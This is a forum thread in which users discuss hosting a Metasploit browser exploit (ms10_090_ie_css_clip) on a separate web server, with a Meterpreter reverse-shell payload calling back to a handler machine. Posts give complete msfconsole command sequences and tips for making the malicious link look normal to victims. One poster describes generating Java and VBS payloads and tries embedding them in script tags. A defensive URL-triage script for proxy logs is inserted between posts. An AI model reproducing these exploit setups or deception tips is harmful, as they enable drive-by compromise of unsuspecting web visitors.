Thread: Metasploit server

  1. #1
    comaX

    Hi everyone!
    In browser attacks, a server is launched on BT, but I would like to "move the server". Let me explain: instead of going to http://192.168.1.2:8080/test for example (which is my BT machine address with the malicious webpage), I would like to export the malicious webpage to another server. Then I would just have to launch the handler on the BT machine.

    Is that possible? If yes, how?

    PS: for those wondering what's the use, well, not so much... I would just like to know, the same way I wanted to know Metasploit, with no goal.
    PS2: Sorry for grammar errors and co., English is not my native language.

  2. #2
    Developer

    Well there are two different variables to set. Lhost is the attacking box and srvhost is the server host. Explore changing the server host.

  3. #3
    comaX

    Thanks for the fast answer. I tried modifying SRVHOST; the server was not started (as expected). But I couldn't manage to do what I wanted...

    The parameters are:
    SRVHOST = Com.org - Only the best links ... (the server I would like the webpage to be on... Of course I didn't expect a page to show up on the server out of nowhere)
    SRVHOST = 80
    URIPATH = test

    The handler caught a signal when I entered http://LHOST:SRVPORT/test, but I don't comprehend what SRVHOST has to do with anything...

    I'll dig some more, but I really have no idea how to move the webpage... Isn't there a way to "export" the malicious webpage as *.html and then host it elsewhere?

  4. #4
    iproute

    What is this second machine you are wanting to run the server on, Windows or Linux? I would run the Metasploit framework (exploit) on your 'webserver' machine, point the reverse payload to your 'handler' machine IP, and set the option
    Code:
    msf exploit(ms10_090_ie_css_clip) > set DisablePayloadHandler=true
    Then start the metasploit framework(handler) on your 'handler' machine.

    With my exploit example, I usually set
    srvhost=0.0.0.0 <--- tells the framework what IP address for the http server to listen on
    srvport=80 <--- what port the http server will listen on.
    uripath=/ <--- the webserver directory structure. Keeping it at / helps things stay simple.



    So in other words, on your webserver machine you might start the framework and do this
    Code:
     
    use windows/browser/ms10_090_ie_css_clip
    set srvhost 192.168.0.50 (this is your webserver machine IP)
    set srvport 80
    set uripath /
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.0.75 (this is your handler machine IP)
    set lport 9999
    set DisablePayloadHandler=true
    exploit
    and on your handler machine you would start the framework and do this
    Code:
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 0.0.0.0
    set lport 9999
    exploit

  5. #5
    comaX

    First of all, thank you!

    I think that would be a good way to do that, but it requires two machines equipped with msf. And what I had in mind was creating the webpage on BT along with the payload, then hosting the webpage on a server, so that when the page is visited, it connects back to the handler on the BT machine.

    The server I use is wampserver on Windows. I started the server to discover html, php and mysql a few days ago, and as I used an exploit that required a webpage, I thought of hosting the page on the wampserver, so that the page looks "normal", and not
    Code:
    http://adress:port/
    which is suspicious. But for stealth purposes, I guess linking from a website to the malicious webpage would do the trick, as people tend not to verify the URLs.

    Can you think of any way to do that?

    From what you said and the research I've done, I'd say it can't be done, but it would be interesting to do.

    About the srvhost: if I understand correctly, it is used to define the interface to use for listening? So it generally is the local host IP address, or 0.0.0.0 for all interfaces. Are there other ways to use this?
    Last edited by comaX; 12-22-2010 at 12:13 PM.

  6. #6
    iproute

    If you set srvport to 80 then the URL you 'give' to victims is just http://malicious.webserver.com/
    and no port like :8080 needs to be at the end of the URL.
    Again, uripath is also useful, as sometimes if you don't specify / as the path then the link ends up looking like
    http://malicious.webserver.com/ad45trfHY3
    which is also somewhat suspicious.

    And yes you are correct, setting 0.0.0.0 for srvhost listens on all IP interfaces, and is generally easiest.


    Also, Metasploit is available on Windows as well, so maybe just install MSF using the Windows installer. Equipping two machines with MSF should be no problem, even if one is a Windows host.
    MSF for Windows

    Regarding creating the webpage on BT msf and exporting to the Windows webserver, maybe try viewing the source of the page created on the BT machine perhaps. You may actually need to dig into some of the framework's Ruby to see how exactly it is configuring the webserver/exploit combo. When it comes to digging into the code, you may want to consider visiting the #metasploit channel on freenode's IRC and asking the developers some questions. They can often point you in the right direction.

    EDIT: It sort of sounds like you're just having difficulty with how the link ends up looking? The default settings for the exploit I mentioned above, for instance, might look like http://malicious.webserver.com:8080/df45DfrT67Yt
    Just try the settings I suggested of
    Code:
    set srvport 80
    set uripath /
    which should clean up the link as I mentioned above, and let us know if that is what you were really looking for. The second server should not be needed with these settings.
    Last edited by iproute; 12-22-2010 at 07:30 PM.
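
Seen from the defender's side, the link shapes described in this thread (an explicit port such as :8080, a bare IP as host, a random path such as /df45DfrT67Yt) are signals a proxy-log triage can score. The following is an added example, not part of the original thread or of Metasploit; the log format, the .example hostnames and the threshold are assumptions, and URL shape alone is a weak signal because, as the thread shows, port and path are configurable.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# One short path segment of letters and digits, like the default link quoted above.
RANDOM_SEGMENT = re.compile(r"^/[A-Za-z0-9]{6,16}$")
STANDARD_PORTS = {None, 80, 443}

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def looks_random(path):
    """True for a single segment mixing upper case, lower case and digits."""
    seg = path[1:]
    return bool(RANDOM_SEGMENT.match(path)) and all(
        any(test(c) for c in seg) for test in (str.isupper, str.islower, str.isdigit))

def score_url(url):
    """Return the reasons a requested URL deserves a second look."""
    parts = urlsplit(url)
    reasons = []
    if parts.port not in STANDARD_PORTS:
        reasons.append("non-standard port %d" % parts.port)
    if parts.hostname and is_ip_literal(parts.hostname):
        reasons.append("IP-literal host")
    if looks_random(parts.path):
        reasons.append("random-looking single path segment")
    return reasons

def triage(log_lines, threshold=2):
    """Return (client, url, reasons) for entries with at least `threshold` signals."""
    rows = (line.split()[:3] for line in log_lines)
    scored = ((client, url, score_url(url)) for client, _method, url in rows)
    return [hit for hit in scored if len(hit[2]) >= threshold]

# Constructed sample proxy log, format "<client> <method> <url>".
SAMPLE_LOG = [
    "10.0.0.21 GET http://intranet.example/wiki/Home",
    "10.0.0.22 GET http://192.168.1.2:8080/test",
    "10.0.0.23 GET http://malicious.webserver.example:8080/df45DfrT67Yt",
    "10.0.0.24 GET http://malicious.webserver.example/",
]

for hit in triage(SAMPLE_LOG):
    print(hit)
```

The last sample entry (port 80, path /) scores zero, so URL-shape triage needs to be paired with content inspection and endpoint telemetry.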

  7. #7
    comaX

    I think this answers part of the question: I read quickly through it because I don't really have the time right now, but it seems that if you create a malicious java applet and host it on your server, this will do just as designed.

    I'll dig some more when I have time and keep you posted in case of success.

    I stumbled upon this while trying to generate a .jar payload, which was an epic failure. So, if you know how to do that, please tell!
    (I used /java/meterpreter/reverse_tcp and tried generating with the following commands:
    Code:
    generate -f java_evil.jar -t java
    generate -f java_evil.jar -t java -x workingjar.jar -k
    and both produced malfunctioning jars...)

    What I basically want to do is done by SET, but then again, it will be hosted on the BT machine. Maybe there is a way to output the java applet so that it can be hosted elsewhere? Or if there is no proper output, maybe it could be harvested in some way? Then again, if you have any idea... Please tell! I'll of course keep searching.

    As for :80 and URIPATH /, I didn't think of it, and it sure works. But I can't use port 80, for it is already in use by the server I intend to host a malicious page on... I also tried msf on Windows, but even with exceptions set, my AV was going all crazy, and still is, long after (not so proper) uninstallation, so I decided just to not use msf on Windows.

    Also, maybe I should post in other threads, but since it may be relevant to this topic: I generated .js and .vbs payloads, thinking I could use them in
    Code:
    <script language="blabla" src="blabla.extension"> </script>
    but it didn't work, at all.
    Since the .js didn't work in Windows, it's not so surprising, but the .vbs did launch a meterpreter session when executed in Explorer, but failed from the browser. Maybe my tags are wrong... I also tried with
    Code:
    <script language="blabla" > actual_vbs_or_js_script </script>
    but it didn't work either.

    Any idea about how to do that?
    Last edited by comaX; 01-06-2011 at 10:52 PM.
